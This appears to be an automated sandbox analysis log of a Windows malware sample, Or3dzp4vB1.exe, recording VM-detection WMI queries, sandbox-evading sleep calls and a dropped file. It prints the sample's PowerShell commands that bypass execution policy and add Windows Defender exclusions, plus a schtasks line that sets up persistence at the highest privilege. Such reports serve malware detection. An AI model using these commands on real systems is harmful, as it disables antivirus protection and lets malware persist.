Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\0720XW	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\0720XW	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\0720XW	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\0720XW	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\0720XW	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\0720XW	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\0720XW	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\0720XW	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\0720XW	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\0720XW	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\0720XW	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\0720XW	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\0720XW	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\0720XW	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\0720XW	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\0720XW	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\0720XW	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\0720XW	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\0720XW	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\0720XW	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Memory allocated: 12D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Memory allocated: 1ACC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\0720XW	Memory allocated: 2590000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\0720XW	Memory allocated: 1A870000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\0720XW	Memory allocated: F10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\0720XW	Memory allocated: 1AA70000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\0720XW	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\0720XW	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Window / User API: threadDelayed 9112	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Window / User API: threadDelayed 733	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4855	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4998	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7595	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2066	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8347	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1147	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7799
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1864

Source: C:\Users\user\Desktop\Or3dzp4vB1.exe TID: 1180	Thread sleep time: -25825441703193356s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7532	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8080	Thread sleep count: 7595 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8108	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8080	Thread sleep count: 2066 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6496	Thread sleep count: 8347 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6376	Thread sleep count: 1147 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4532	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3232	Thread sleep count: 7799 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3232	Thread sleep count: 1864 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Users\user\AppData\Roaming\0720XW TID: 2196	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8076	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\0720XW TID: 6792	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\0720XW	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\0720XW	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\0720XW	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\0720XW	Thread delayed: delay time: 922337203685477

Source: svchost.exe, 0000001A.00000002.2484722276.000001C43905E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2482179836.000001C437C2B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Or3dzp4vB1.exe, 00000000.00000002.2518894545.000000001BBA0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\Or3dzp4vB1.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\0720XW	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\0720XW	Process token adjusted: Debug

Source: C:\Users\user\Desktop\Or3dzp4vB1.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Or3dzp4vB1.exe'
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\0720XW'
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Or3dzp4vB1.exe'	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\0720XW'	Jump to behavior

Bypasses PowerShell execution policy

Source: C:\Users\user\Desktop\Or3dzp4vB1.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Or3dzp4vB1.exe'

Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Or3dzp4vB1.exe'	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Or3dzp4vB1.exe'	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\0720XW'	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '0720XW'	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "0720XW" /tr "C:\Users\user\AppData\Roaming\0720XW"	Jump to behavior

Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Queries volume information: C:\Users\user\Desktop\Or3dzp4vB1.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
